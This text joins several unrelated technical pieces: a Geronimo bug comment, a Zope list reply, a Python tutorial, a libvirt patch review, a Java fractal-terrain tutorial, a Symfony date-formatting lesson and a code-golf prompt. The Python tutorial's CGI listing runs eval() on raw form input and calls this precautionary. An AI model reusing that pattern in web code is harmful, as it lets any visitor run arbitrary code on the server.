> I saw the same problem in another area of my code where the UUID was correct and then zero'ed. This problem seems to be directly attributable to the fact that a view controller is defined as @ViewScoped. I don't see the problem when I change the controller to @SessionScoped.
> Not sure what is going on here but these UUID's are getting zero'ed by someone/something/somecode both before getting stored and after reactivation. I am fairly confident that this is not my code that is causing the problem b/c I've tried to explicitly update the UUID's but Geronimo won't let me b/c they have been made final by Geronimo.
> FYI I am using the TABLE_PER_CLASS model
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see:
http://mail-archives.apache.org/mod_mbox/geronimo-dev/201307.mbox/%3CJIRA.12654830.1372197905147.202545.1372812560023@arcas%3E
Hi Philipp

> > Yes, but this is only a problem how we lookup views/pages via /@@ in
> > templates.
>
> That's how we lookup views. @@ is short for ++view++. Traversal
> namespaces are the way to lookup things that are not direct attributes.

The namespace ++view++ is in the first line a namespace which makes it possible to use the same naming for objects and views on a container. Second, this is callable via the @@ in page templates. The implementation that we didn't use a tales expression is bad. It doesn't make sense to me that we can automatically use traversal namespaces in tales. I think the API for implementing additional functionality is the ITALESExpression interface. Every other implementation which makes something possible in TAL is bad. That's just what I think.

Yes, I know, but where do we describe the interface for that? Is there an interface somewhere where I can see why I can call a traversal namespace from TAL? Perhaps I missed this till now. How do you explain the TAL implementation of a @@ lookup to someone?

Regards
Roger Ineichen

> Philipp
> _______________________________________________
> Zope3-dev mailing list
> Zope3-dev@zope.org
> Unsub:
https://www.mail-archive.com/zope3-dev@zope.org/msg05165.html
Python has been around for a dozen years and is going strong — two production releases a year, a vibrant community, lively Net presence, yearly conferences, tracks on Python at Open Source and Web Development venues, books, articles, the works. Why is Python so popular? The reasons are simplicity, regularity, and the talent of Guido van Rossum, Python’s inventor and Benevolent Dictator For Life. Hundreds of people contribute to Python, but Guido has the final say; his hand at the helm makes Python a well-architected whole, not a soup of “features” (For more on Guido, see our interview with him in the December 2001 issue, available online at.). There are no “convenient” shortcuts, quirks, or special cases: just power through simplicity, clean syntax, and generality.
Python is simple inside, too; its highly modular, structured internals and clean, well-documented API make it easy to port, extend, embed in applications, and interface with existing libraries. Jython, the 100 percent pure Java implementation of Python, lets you deploy Python wherever you can use Java, with full access to Java’s class libraries.
Python can also be found embedded in applications such as the cooledit editor and the Blender 3D modeler and is at the heart of the Zope Web application server. And Python has lots of extensions to let you handle diverse tasks, including numerical applications, image processing, distributed computing, multimedia, and games.
If you’re just beginning to learn how to program, are doing object-oriented programming, writing scripts, prototyping large programs, or even developing them entirely, Python is a strong candidate. Python provides power through simplicity, with full-featured core libraries, easy interfacing, and backwards compatibility, too.
Let’s take a closer look at Python and see just how it provides all this power.
Installation and Configuration…If You Need It
Python is probably already on your system. Try running python -V at a shell prompt; if Python’s in your PATH, this tells you which version it is.
If you don’t have Python, or have an older release (such as 1.5.2), you can either install it with whatever tool your distribution uses or download the source package for the latest stable release (currently 2.2) from.
You can then build and install Python by running the following commands:
$ tar xzf Python-2.2.tgz
$ cd Python-2.2
$ ./configure
$ make
$ sudo make install
That’s it; you now have the latest and greatest Python release. For your convenience, make sure /usr/local/bin is in your PATH. If you have problems, send e-mail to help@python.org, giving all the details (copy and paste error messages, don’t summarize them). Many volunteers monitor that “help line,” so you should be able to get up and running quickly.
Interactive Python
An easy way to try Python is via the interactive interpreter:
$ python
Python 2.2 (#1, Nov 30 2001, 15:08:22)
[GCC 2.96 20000731 (Mandrake Linux 8.1 2.96-0.62mdk)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>
>>> is the prompt the interactive interpreter uses to ask for any statement or expression:
>>> 2+2
4
>>> 1.23**4.56
2.5702023016193025
The ** operator performs exponentiation, so we have just computed 1.23 to the 4.56th power. Python is a nice advanced calculator, but you will notice it’s missing trigonometric and other functions. No problem, they’re in the library (in the math module); we just need to import it:
>>> import math
>>> math.log(1.23**math.sin(0.45))
0.090044028754846059
The command import math binds the name math to the math module object, making all names bound in the module available as attributes of math, as shown by the calls to math.log and math.sin. If you don’t like the name math, you can bind the module object to a different name:
>>> import math as Foo
>>> Foo.log(1.23**Foo.sin(0.45))
0.090044028754846059
Alternatively, the command from math import * puts all the names from the math module into your current namespace, making them available directly:
>>> from math import *
>>> log(1.23**sin(0.45))
0.090044028754846059
The command from modulename import * is handy for interactive use or tiny scripts but much less readable in “real” programs; the reader might wonder where the names log and sin came from.
A lot of Python’s functionality lives in the library, neatly organized into modules and packages (hierarchical collections of modules). The current standard library has 165 top-level modules and packages and a total of almost 300 modules (including platform-specific ones); we’ll see some of them in later examples.
Python’s interactive interpreter is a text-mode program. If you prefer to use a GUI program for your development, you can use IDLE, the Python Interactive DeveLopment Environment, that is included with Python. IDLE is built with Tkinter, one of many Python packages that you can also use to develop your own GUI applications. You need to have Tcl/Tk (8.1 or better) installed on your system before you can build or use Tkinter. If you need to, you can download Tcl/Tk from.
IDLE’s “shell window” (see Figure One) resembles the interactive interpreter but adds features such as colorization and call tips. Menus and shortcuts let you open editor windows, write and edit Python scripts, run the debugger, view the stack, and so on. Many other Python IDEs, both free and commercial, are also available. Many old-timers, however, prefer the interactive interpreter and a good text editor.
Scripts
Python scripts are just text files (often with the extension “.py“, but it’s not required). Listing One contains a script that evaluates an arbitrary expression passed as an argument to it. If we run this program, we might see output like this:
Listing One: exp
1 #!/usr/local/bin/python
2
3 from math import *
4 import sys
5
6 expression = sys.argv[1]
7 print expression,'=',eval(expression)
$ ./exp 2+2
2+2 = 4
$ ./exp 1.23**4.56
1.23**4.56 = 2.57020230162
We use the normal Unix hash-bang (#!) method to invoke Python. Line 3 imports all the names from the math module. Line 4 imports the sys module, which gives us access to important aspects of a program’s environment. The expression sys.argv[1] is the first argument passed to the program; since we want to evaluate it as an expression, we bind it to the name expression in line 6. You could say “assign it to the variable” rather than “bind it to the name,” but “bind” and “name” better convey the connotations that correspond to Python’s semantics; this is covered in more detail later.
The print statement in line 7 emits the expression, an equals sign, and the result obtained by evaluating the expression with the built-in function eval. The print statement automatically inserts spaces between the items it emits, and a newline at the end.
You may notice that print displayed the result of 1.23**4.56 with fewer digits than the interactive interpreter showed; floating-point arithmetic is inexact, and print and the interactive interpreter use different defaults for the number of digits to display. This is adjustable if you so desire.
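You can see the difference yourself by formatting the same value explicitly. A quick sketch (the %g/%f conversion codes are standard Python string formatting):

```python
x = 1.23 ** 4.56

s = "%.12g" % x    # 12 significant digits, roughly what the print statement shows
r = repr(x)        # full precision, as the interactive interpreter shows
f = "%.3f" % x     # explicit control when you want exactly 3 decimals
```

Using an explicit format string is the usual way to pin down the display precision, whichever default you started from.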
Python and the Web
The shell is not the only way to run scripts. Web servers — such as Apache, for example — are popular ways to run scripts via the CGI standard. Listing Two contains a CGI script to evaluate expressions.
Listing Two: A cgi Script: exp.cgi
1 #!/usr/local/bin/python
2 from math import *
3 import cgi, sys
4
5 expression = ''
6 form = cgi.FieldStorage()
7 if form.has_key('expr'):
8     expression = form['expr'].value
9     try: result = eval(expression)
10     except:
11         error, detail, etcetc = sys.exc_info()
12         result = ': error: '+str(error)+', '+str(detail)
13
14 print 'Content-type: text/html'
15 print
16 if expression: print '<p>',expression,'=',result,'</p>'
17
18 print '<p><form action="./exp.cgi">'
19 print 'Expression: <input type="text" name="expr"></input>'
20 print '</form></p>'
After placing this script in your cgi-bin directory, visiting from a browser will activate the script.
This script is more complicated than the first because it takes precautions against irregular input. Line 5 binds the name expression to '', the empty string. Line 6 calls the function FieldStorage of the cgi module, binding the result to the name form, allowing access to the form data. The object bound to the name form is a “dictionary” in Python (similar to a Perl “hash” or a C++ “std::map”). Using the name of a field from the form as the “index” into this object retrieves the field’s value.
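The same indexing pattern works on any Python dictionary. Here is a minimal stand-in for the form handling, where a literal dictionary replaces the real cgi.FieldStorage object purely for illustration:

```python
# A plain dict standing in for cgi.FieldStorage() data (illustration only)
form = {"expr": "2+2"}

expression = ""
if "expr" in form:            # same idea as form.has_key('expr')
    expression = form["expr"]

result = eval(expression)
```

Membership testing and indexing behave the same on the real form object; FieldStorage just adds a .value attribute on each field.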
Line 7 checks to see if the form included a field named “expr“; if not, the name expression remains bound to the empty string, so that the if statement on line 16 later evaluates it as false and makes no attempt to emit the expression and the result of its evaluation.
If the form does have a field named “expr,” line 8 binds its value to the name expression, and line 9 tries to evaluate the expression with the eval function and binds the result to the name result. Line 9 starts with a try clause, so any error it might raise is caught by the corresponding except clause in line 10, in which case lines 11-12 bind result to an error message. The + operators on line 12 perform string concatenation, not addition, since the objects they operate on are strings, not numbers.
Finally, lines 14-15 and 18-20 unconditionally emit the HTML form needed to access this script. Thus, the first time you visit the script’s URL, you’ll just get the form; when you fill in and submit the form, you get the result and the form again, in case you want to ask for another result.
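The error-handling idiom from lines 9-12 is also useful on its own. A small helper sketching it (the function name safe_eval is hypothetical, not from the article):

```python
import sys

def safe_eval(expression):
    """Evaluate an expression; return an error string instead of raising."""
    try:
        return eval(expression)
    except:
        # sys.exc_info() describes the exception just raised
        error, detail = sys.exc_info()[:2]
        return expression + ": error: " + str(error) + ", " + str(detail)
```

safe_eval("2+2") returns 4, while safe_eval("2+") returns a string describing the SyntaxError rather than crashing the script.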
You may have noticed that neither the if statement nor the except clause have any punctuation to delimit what is contained within their scopes. This is by design; all groupings of statements, such as the guarded block of an if statement or the statements within an except clause, are done by indentation; grouped statements are aligned with each other and shifted rightwards. Spaces and tabs can be intermixed and Python considers tabs to be equivalent to eight spaces, but it’s generally best to use all spaces.
Python uses neither keywords nor punctuation for statement grouping — a syntactic minimalism shared by a few other languages, including Haskell (named after logician Haskell Curry) and Occam (named in honor of medieval philosopher William of Occam, known for his principle, “Occam’s Razor”). Python, in case you didn’t know, is named in honor of Monty Python’s Flying Circus.
A Simple Search Engine in Python
Let’s take a look at some more of the modules in Python’s library. Say you have a directory full of important text files and often grep through them looking for certain words. Let’s use Python to index these files, then build a small search engine so we can search through them quicker. Take a look at Listing Three.
Listing Three: Creating An Index
1 import glob, fileinput, re, shelve
2
3 aword = re.compile(r'\b[\w-]+\b')
4 index = {}
5
6 for line in fileinput.input(glob.glob('*.txt')):
7     location = fileinput.filename(), fileinput.filelineno()
8     for word in aword.findall(line.lower()):
9         index.setdefault(word,[]).append(location)
10
11 shelf = shelve.open('shelf','n')
12 for word in index:
13     shelf[word] = index[word]
14 shelf.close()
Line 3 binds the name aword to a regular expression object identifying a word: one or more word characters or hyphens between word boundaries. Line 4 binds the name index to an empty dictionary.
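You can try the same pattern on a sample string to see what counts as a word (a quick sketch):

```python
import re

# Same pattern as line 3 of Listing Three: word characters or hyphens
# between word boundaries.
aword = re.compile(r"\b[\w-]+\b")

words = aword.findall("Hello, well-known world!".lower())
# Hyphenated words survive as single tokens: hello, well-known, world
```

Because the hyphen is inside the character class, "well-known" is indexed as one word instead of two.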
Line 6 loops over every line of all files that end with .txt in the current directory. Line 7 binds the name location to the current filename and line number. Line 8 loops over all the words in the line (using a lowercased copy of the string in line, as we are interested in case-independent searching).
Line 9 is executed for each word in each line. The setdefault method of the dictionary index returns the existing index entry for the word, or if the word was not yet in the index, setdefault binds a new entry to the default value [] (an empty list), and returns it. The append method adds the location value to the list.
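The setdefault idiom is worth internalizing; here it is in isolation, indexing a few hard-coded (word, location) pairs:

```python
index = {}
occurrences = [("python", ("a.txt", 1)),
               ("fun", ("a.txt", 1)),
               ("python", ("b.txt", 3))]

for word, location in occurrences:
    # Fetch the word's list, creating an empty one on first sight,
    # then append the new location to it.
    index.setdefault(word, []).append(location)
```

After the loop, index["python"] holds both locations in encounter order, and no word needed a separate "is it already there?" check.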
When the loop is done, our index is stored in the dictionary index. We need to persist the index to disk in an easily searchable form. This is done with the shelve module. Line 11 opens a new shelf object in the file shelf and binds the name shelf to the resulting Python object. Lines 12-13 persist the dictionary to the shelf, element by element. Finally, line 14 closes the shelf object, and we’re done; our index is on disk, ready for searching.
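A shelf behaves like a dictionary whose contents survive on disk. This round-trip sketch uses a temporary directory so it can run anywhere:

```python
import os
import shelve
import tempfile

path = os.path.join(tempfile.mkdtemp(), "demo_shelf")

shelf = shelve.open(path, "n")      # 'n' always creates a new, empty shelf
shelf["python"] = [("a.txt", 1)]    # stored like an ordinary dictionary entry
shelf.close()

shelf = shelve.open(path, "r")      # reopen read-only: the data is back
restored = shelf["python"]
shelf.close()
```

Values are pickled behind the scenes, so any picklable Python object (like our lists of location tuples) can be shelved.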
Listing Four contains a simple script that uses the index to search for words and displays three lines centered around each occurrence.
Listing Four: Using An Index
1 import shelve, sys, linecache
2
3 shelf = shelve.open('shelf', 'r')
4
5 for word in sys.argv[1:]:
6     try:
7         locations = shelf[word.lower()]
8     except KeyError:
9         print word+': not found'
10     else:
11         print word+':'
12         for file, line in locations:
13             print '  In file', file+':'
14             for delta in -1, 0, 1:
15                 aline = linecache.getline(file, line+delta)
16                 if aline: print '   ', aline,
Line 3 opens the ‘shelf’ file in read-only mode and binds the resulting Python object to the name shelf. Line 5 loops over each word (passed as arguments to the script); the construct sys.argv[1:], called a list slice, returns all the command-line arguments passed to the program. Line 7 looks up the list of locations for the word (lower-cased, again, to make the search case insensitive). The actual lookup is within the try statement in line 6, so that if the word is not in the index, the except clause in lines 8 and 9 handle the error by printing the “not found” message. The else clause in line 10 executes if no error was raised (i.e., if the lookup succeeded).
In this case, we print the word (line 11), then loop over the list of locations (line 12), printing the file name for each (line 13). The loop in lines 14-16 gets and prints the lines immediately before and after the line in which the word occurs, applying deltas of -1, 0, and 1 to the line number bound to line. The getline function from the linecache module is called with a filename and line number as arguments and returns the requested line (as a string, complete with trailing newline). If the requested line is not found (as might happen in our script, when a word is found on the first or last line of a file) then getline returns an empty string.
The if statement in line 16 prevents the print statement from printing nonexistent lines. The final comma causes the print statement to not emit a newline because the aline string already ends with one.
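linecache's forgiving behavior on out-of-range line numbers is easy to verify; a sketch using a throwaway file:

```python
import linecache
import os
import tempfile

path = os.path.join(tempfile.mkdtemp(), "demo.txt")
f = open(path, "w")
f.write("first line\nsecond line\n")
f.close()

line1 = linecache.getline(path, 1)    # "first line\n", trailing newline kept
line99 = linecache.getline(path, 99)  # "" for a nonexistent line, no error
```

That empty-string convention is exactly what lets Listing Four skip missing context lines with a simple truth test instead of extra bounds checking.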
Extending and Embedding
Another feature that makes Python fun to use is its C-level API. It’s easy to extend Python with new functionality and to embed a Python interpreter in another application. There are a lot of extension modules written in C you can download and use, and you can find Python embedded as the scripting language of many applications.
The Simplified Wrapper and Interface Generator, SWIG (), makes it easy to wrap existing C libraries into Python extensions. If you like C++, you have even more choices. The Boost Python library () lets you turn your C++ libraries into Python extensions using all the power of C++’s templates.
But I Need 100 Percent Pure Java
And if you want to access Java classes from within Python, you’re in luck! Jython () implements the Python language in 100 percent pure Java. You need a highly compliant JVM (Kaffe doesn’t work, for example, but Javasoft releases do), because Jython exercises the Java specs to the limit. But what you get is awesome; your Python code can import and use any existing Java class just as if it were a Python module. No wrapping, no adaptation; the Jython runtime does it for you via Java reflection. A simple Jython servlet is shown in Listing Five.
Listing Five: A Jython Servlet
import javax

class hello(javax.servlet.http.HttpServlet):
    def doGet(self, request, response):
        response.setContentType('text/html')
        out = response.getOutputStream()
        out.write('''<html><head><title>Hello World</title></head>
<body><p>Now <b>this</b> is simplicity!</p></body></html>''')
        out.close()
Check It Out!
As we have seen in this article, Python can be used to perform many different kinds of tasks. Python’s rich library of modules lets you apply it to almost any kind of programming endeavor: database munging, number-crunching, image processing, games, Web servers, even cryptography.
It’s good that Python can do so much, because that has a practical benefit: ease of software maintenance. Programs do need to be maintained, even if you thought of them as “throwaway” when you wrote them. If you use a scripting language that emphasizes concision, variety, and cleverness, going back to a script written months ago can be a harrowing experience. Python emphasizes clarity, simplicity, and readability so that revisiting your old scripts is fun, not a chore. The proof of the pudding is in the eating, and the proof of Python is in the programming. Give Python a try. You deserve it!
Resources
Main site, chock full of both material and links:
Mailing lists and newsgroups:
news://comp.lang.python
You can also mail any help request to help@python.org (volunteer helpers watch this address and will give you personalized help).
IDLE:
Tkinter:
Some of the popular applications that embed and/or are written in Python:
Zope:
Cooledit:
Blender:
PySol:
Extending Python:
Extending manual:
C API reference:
Boost Python:
SWIG:
Jython (Python on the Java Virtual Machine):
http://www.linux-mag.com/id/1025/
On 01/25/2012 01:13 PM, Marc-André Lureau wrote:
> Define PID_FORMAT and fix warnings for mingw64 x86_64 build.
>
> Unfortunately, gnu_printf attribute check expect %lld while normal
> printf is PRId64. So one warning remains.
> ---
>  src/rpc/virnetsocket.c |  4 ++--
>  src/util/command.c     | 10 +++++-----
>  src/util/util.h        |  8 ++++++++
>  src/util/virpidfile.c  |  6 +++---
>  4 files changed, 18 insertions(+), 10 deletions(-)

This failed 'make syntax-check':

libvirt_unmarked_diagnostics
src/util/command.c-2198- PID_FORMAT ") status unexpected: %s"),

which may be a flaw in cfg.mk rather than an actual bug, but still one we should address.

Also, I'm not quite convinced on your approach. While it's nice to hide the type behind a macro:

> +#ifdef _WIN64
> +/* XXX gnu_printf prefers lld while non-gnu printf expect PRId64... */

Libvirt should not be using non-gnu printf. What function call gave you that warning, so that we can fix it to use gnu printf?

> +# define PID_FORMAT "lld"
> +#else
> +# define PID_FORMAT "d"
> +#endif

the decision should _not_ be based on _WIN64, but instead on a configure-time test on the underlying type of pid_t. And since _that_ gets difficult, I'd almost rather go with the simpler approach of:

"%" PRIdMAX, (intmax_t) pid

everywhere that we currently use "%d", pid

--
Eric Blake eblake redhat com +1-919-301-3266
Libvirt virtualization library
Attachment:
signature.asc
Description: OpenPGP digital signature
https://www.redhat.com/archives/libvir-list/2012-January/msg01071.html
3D computer graphics have many uses -- from games to data visualization, virtual reality, and beyond. More often than not, speed is of prime importance, making specialized software and hardware a must to get the job done. Special-purpose graphics libraries provide a high-level API, but hide how the real work is done. As nose-to-the-metal programmers, though, that's not good enough for us! We're going to put the API in the closet and take a behind-the-scenes look at how images are actually generated -- from the definition of a virtual model to its actual rendering onto the screen.
Terrain maps
Let's start by defining a terrain map. A terrain map is a function that maps a 2D coordinate (x,y) to an altitude a and color c. In other words, a terrain map is simply a function that describes the topography of a small area.
Transcendental terrains
We'll start by looking at a transcendental terrain -- fancyspeak for a terrain computed from sines and cosines:
public class TranscendentalTerrain implements Terrain {
  private double alpha, beta;

  public TranscendentalTerrain (double alpha, double beta) {
    this.alpha = alpha;
    this.beta = beta;
  }

  public double getAltitude (double i, double j) {
    return .5 + .5 * Math.sin (i * alpha) * Math.cos (j * beta);
  }

  public RGB getColor (double i, double j) {
    return new RGB (.5 + .5 * Math.sin (i * alpha),
                    .5 - .5 * Math.cos (j * beta), 0.0);
  }
}
Our constructor accepts two values that define the frequency of our terrain. We use these to compute altitudes and colors using Math.sin() and Math.cos(). Remember, those functions return values -1.0 <= sin(),cos() <= 1.0, so we must adjust our return values accordingly.
Fractal terrains
Simple mathematical terrains are no fun. What we want is something that looks at least passably real. We could use real topography files as our terrain map (the San Francisco Bay or the surface of Mars, for example). While this is easy and practical, it's somewhat dull. I mean, we've been there. What we really want is something that looks passably real and has never been seen before. Enter the world of fractals.
A fractal is something (a function or object) that exhibits self-similarity. For example, the Mandelbrot set is a fractal function: if you magnify the Mandelbrot set greatly you will find tiny internal structures that resemble the main Mandelbrot itself. A mountain range is also fractal, at least in appearance. From close up, small features of an individual mountain resemble large features of the mountain range, even down to the roughness of individual boulders. We will follow this principle of self-similarity to generate our fractal terrains.
Essentially what we'll do is generate a coarse, initial random terrain. Then we'll recursively add additional random details that mimic the structure of the whole, but on increasingly smaller scales. The actual algorithm that we will use, the Diamond-Square algorithm, was originally described by Fournier, Fussell, and Carpenter in 1982 (see Resources for details).
These are the steps we'll work through to build our fractal terrain:
1. We first assign a random height to the four corner points of a grid.
2. We then take the average of these four corners, add a random perturbation and assign this to the midpoint of the grid (ii in the following diagram). This is called the diamond step because we are creating a diamond pattern on the grid. (At the first iteration the diamonds don't look like diamonds because they are at the edge of the grid; but if you look at the diagram you'll understand what I'm getting at.)
3. We then take each of the diamonds that we have produced, average the four corners, add a random perturbation and assign this to the diamond midpoint (iii in the following diagram). This is called the square step because we are creating a square pattern on the grid.
4. Next, we reapply the diamond step to each square that we created in the square step, then reapply the square step to each diamond that we created in the diamond step, and so on until our grid is sufficiently dense.
An obvious question arises: How much do we perturb the grid? The answer is that we start out with a roughness coefficient 0.0 < roughness < 1.0. At iteration n of our Diamond-Square algorithm we add a random perturbation to the grid: -roughness^n <= perturbation <= roughness^n. Essentially, as we add finer detail to the grid, we reduce the scale of changes that we make. Small changes at a small scale are fractally similar to large changes at a larger scale.
If we choose a small value for roughness, then our terrain will be very smooth -- the changes will very rapidly diminish to zero. If we choose a large value, then the terrain will be very rough, as the changes remain significant at small grid divisions.
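To see this decay in numbers, here is a small illustrative Python snippet (not part of the original article): at iteration n the perturbation is bounded by plus or minus roughness**n, so a small coefficient dies off quickly while a large one stays significant.

```python
# Perturbation amplitude per iteration for a smooth and a rough setting.
for roughness in (0.3, 0.8):
    amplitudes = [roughness ** n for n in range(1, 6)]
    print(roughness, ["%.5f" % a for a in amplitudes])
```

With roughness 0.3 the amplitude is already below 0.0025 by iteration 5; with 0.8 it is still about 0.33, which is why the second terrain stays jagged at fine grid divisions.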
Here's the code to implement our fractal terrain map:
public class FractalTerrain implements Terrain {
  private double[][] terrain;
  private double roughness, min, max;
  private int divisions;
  private Random rng;

  public FractalTerrain (int lod, double roughness) {
    this.roughness = roughness;
    this.divisions = 1 << lod;
    terrain = new double[divisions + 1][divisions + 1];
    rng = new Random ();
    terrain[0][0] = rnd ();
    terrain[0][divisions] = rnd ();
    terrain[divisions][divisions] = rnd ();
    terrain[divisions][0] = rnd ();
    double rough = roughness;
    for (int i = 0; i < lod; ++ i) {
      int q = 1 << i, r = 1 << (lod - i), s = r >> 1;
      for (int j = 0; j < divisions; j += r)
        for (int k = 0; k < divisions; k += r)
          diamond (j, k, r, rough);
      if (s > 0)
        for (int j = 0; j <= divisions; j += s)
          for (int k = (j + s) % r; k <= divisions; k += r)
            square (j - s, k - s, r, rough);
      rough *= roughness;
    }
    min = max = terrain[0][0];
    for (int i = 0; i <= divisions; ++ i)
      for (int j = 0; j <= divisions; ++ j)
        if (terrain[i][j] < min) min = terrain[i][j];
        else if (terrain[i][j] > max) max = terrain[i][j];
  }

  private void diamond (int x, int y, int side, double scale) {
    if (side > 1) {
      int half = side / 2;
      double avg = (terrain[x][y] + terrain[x + side][y] +
        terrain[x + side][y + side] + terrain[x][y + side]) * 0.25;
      terrain[x + half][y + half] = avg + rnd () * scale;
    }
  }

  private void square (int x, int y, int side, double scale) {
    int half = side / 2;
    double avg = 0.0, sum = 0.0;
    if (x >= 0) { avg += terrain[x][y + half]; sum += 1.0; }
    if (y >= 0) { avg += terrain[x + half][y]; sum += 1.0; }
    if (x + side <= divisions) { avg += terrain[x + side][y + half]; sum += 1.0; }
    if (y + side <= divisions) { avg += terrain[x + half][y + side]; sum += 1.0; }
    terrain[x + half][y + half] = avg / sum + rnd () * scale;
  }

  private double rnd () { return 2.0 * rng.nextDouble () - 1.0; }

  public double getAltitude (double i, double j) {
    double alt = terrain[(int) (i * divisions)][(int) (j * divisions)];
    return (alt - min) / (max - min);
  }

  private RGB blue = new RGB (0.0, 0.0, 1.0);
  private RGB green = new RGB (0.0, 1.0, 0.0);
  private RGB white = new RGB (1.0, 1.0, 1.0);

  public RGB getColor (double i, double j) {
    double a = getAltitude (i, j);
    if (a < .5)
      return blue.add (green.subtract (blue).scale ((a - 0.0) / 0.5));
    else
      return green.add (white.subtract (green).scale ((a - 0.5) / 0.5));
  }
}
In the constructor, we specify both the roughness coefficient roughness and the level of detail lod. The level of detail is the number of iterations to perform -- for a level of detail n, we produce a grid of (2^n + 1 x 2^n + 1) samples. For each iteration, we apply the diamond step to each square in the grid and then the square step to each diamond. Afterwards, we compute the minimum and maximum sample values, which we'll use to scale our terrain altitudes.
To compute the altitude of a point, we scale and return the closest grid sample to the requested location. Ideally, we would actually interpolate between surrounding sample points, but this method is simpler, and good enough at this point. In our final application this issue will not arise because we will actually match the locations where we sample the terrain to the level of detail that we request. To color our terrain, we simply return a value between blue, green, and white, depending upon the altitude of the sample point.
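The nearest-sample lookup above snaps to the closest grid point. The interpolation the paragraph mentions could look roughly like the following; this is an illustrative Python sketch with made-up names, not code from the article:

```python
def bilinear(grid, u, v):
    # grid: a 2D list of altitude samples; (u, v) each in [0, 1].
    # Blend the four surrounding samples by their fractional offsets.
    rows, cols = len(grid) - 1, len(grid[0]) - 1
    x, y = u * rows, v * cols
    i, j = min(int(x), rows - 1), min(int(y), cols - 1)
    fx, fy = x - i, y - j
    top = grid[i][j] * (1 - fx) + grid[i + 1][j] * fx
    bottom = grid[i][j + 1] * (1 - fx) + grid[i + 1][j + 1] * fx
    return top * (1 - fy) + bottom * fy
```

On a 2x2 grid, bilinear(grid, 0.5, 0.5) blends all four corners equally, so the surface varies smoothly between samples instead of jumping at cell boundaries.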
Tessellating our terrain
We now have a terrain map defined over a square domain. We need to decide how we are going to actually draw this onto the screen. We could fire rays into the world and try to determine which part of the terrain they strike, as we did in the previous article. This approach would, however, be extremely slow. What we'll do instead is approximate the smooth terrain with a bunch of connected triangles -- that is, we'll tessellate our terrain.
Tessellate: to form into or adorn with mosaic (from the Latin tessellatus).
To form the triangle mesh, we will evenly sample our terrain into a regular grid and then cover this grid with triangles -- two for each square of the grid. There are many interesting techniques that we could use to simplify this triangle mesh, but we'd only need those if speed was a concern.
The following code fragment populates the elements of our terrain grid with fractal terrain data. We scale down the vertical axis of our terrain to make the altitudes a bit less exaggerated.
double exaggeration = .7;
int lod = 5;
int steps = 1 << lod;
Triple[][] map = new Triple[steps + 1][steps + 1];
RGB[][] colors = new RGB[steps + 1][steps + 1];
Terrain terrain = new FractalTerrain (lod, .5);
for (int i = 0; i <= steps; ++ i) {
  for (int j = 0; j <= steps; ++ j) {
    double x = 1.0 * i / steps, z = 1.0 * j / steps;
    double altitude = terrain.getAltitude (x, z);
    map[i][j] = new Triple (x, altitude * exaggeration, z);
    colors[i][j] = terrain.getColor (x, z);
  }
}
You may be asking yourself: So why triangles and not squares? The problem with using the squares of the grid is that they're not flat in 3D space. If you consider four random points in space, it's extremely unlikely that they'll be coplanar. So instead we decompose our terrain to triangles because we can guarantee that any three points in space will be coplanar. This means that there'll be no gaps in the terrain that we end up drawing.
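The coplanarity claim is easy to check numerically. The scalar triple product of the three edge vectors leaving one corner is zero exactly when all four points share a plane; for random points it is almost never zero. This is an illustrative Python check, not code from the article:

```python
import random

def triple_product(p0, p1, p2, p3):
    # Scalar triple product a . (b x c) of the edge vectors from p0;
    # it is zero iff the four points lie in a common plane.
    a = [p1[k] - p0[k] for k in range(3)]
    b = [p2[k] - p0[k] for k in range(3)]
    c = [p3[k] - p0[k] for k in range(3)]
    cross = (b[1] * c[2] - b[2] * c[1],
             b[2] * c[0] - b[0] * c[2],
             b[0] * c[1] - b[1] * c[0])
    return sum(a[k] * cross[k] for k in range(3))
```

Any three points trivially pass, since two edge vectors always span a plane through their base point; it takes a fourth point to leave that plane, which is why the grid squares must be split into triangles.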
http://www.javaworld.com/article/2076745/learn-java/3d-graphic-java--render-fractal-landscapes.html
Let's make this date dynamic! The field on Question that we're going to use is $askedAt, which - remember - might be null. If a Question hasn't been published yet, then it won't have an askedAt.
Let's plan for this. In the template, add {% if question.askedAt %} with an {% else %} and {% endif %}. If the question is not published, say (unpublished).
In a real app, we would probably not allow users to see unpublished questions... we could do that in our controller by checking for this field and saying throw $this->createNotFoundException() if it's null. But... maybe a user will be able to preview their own unpublished questions. If they did, we'll show unpublished.
The easiest way to try to print the date would be to say {{ question.askedAt }}.
But... you might be shouting: "Hey Ryan! That's not going to work!".
And... you're right:
Object of class DateTime could not be converted to string
We know that when we have a datetime type in Doctrine, it's stored in PHP as a DateTime object. That's nice because DateTime objects are easy to work with... but we can't simply print them.
To fix this, pass the DateTime object through a |date() filter. This takes a format argument - something like Y-m-d H:i:s.
When we try the page now... it's technically correct... but yikes! This... well... how can I put this politely: it looks like a backend developer designed this.
Whenever I render dates, I like to make them relative. Instead of printing an exact date, I prefer something like "10 minutes ago". It also avoids timezone problems... because 10 minutes ago makes sense to everyone! But this exact date would really need a timezone to make sense.
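For illustration only, here is a rough Python sketch of what a relative-date filter computes (the bundle used below is PHP and its real implementation handles far more cases):

```python
from datetime import datetime, timedelta, timezone

def ago(when, now=None):
    # Render an absolute timestamp as a rough relative phrase,
    # sidestepping timezone display issues entirely.
    now = now or datetime.now(timezone.utc)
    seconds = int((now - when).total_seconds())
    for unit, size in (("day", 86400), ("hour", 3600), ("minute", 60)):
        if seconds >= size:
            n = seconds // size
            return "%d %s%s ago" % (n, unit, "" if n == 1 else "s")
    return "just now"
```

Formatting "10 minutes ago" needs no timezone conversion at display time, which is exactly the point made above.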
So let's do this. Start by adding the word "Asked" back before the date. Cool.
To convert the DateTime into a friendly string, we can install a nice bundle. At your terminal, run:
composer require knplabs/knp-time-bundle
You could find this bundle if you googled for "Symfony ago". As we know, the main thing that a bundle gives us is more services. In this case, the bundle gives us one main service that provides a Twig filter called ago.
It's pretty awesome. Back in the template, add |ago.
We're done! When we refresh now... woohoo!
Asked 1 month ago
Next: let's make the homepage dynamic by querying for all of the questions in the database and rendering them. Along the way, we're going to learn a secret about the repository object.
https://symfonycasts.com/screencast/symfony5-doctrine/ago
Shortest Code Contest
Write a piece of code to solve some mathematical expressions.
These mathematical expressions will be very simple - each expression will consist of two numbers and a single operation.
All numbers will be positive integers less than 100, and the only operations will be +,- and *.
There will be multiple test cases - the first line will indicate the number of tests.
Oh, I almost forgot to mention: you can't use semicolons!
Your score will be (86 / N)^2 x 10, where N is the number of non-whitespace characters in your code.
Sample Input
3 6*7 67-25 31+11
Sample Output
42 42 42
All Submissions
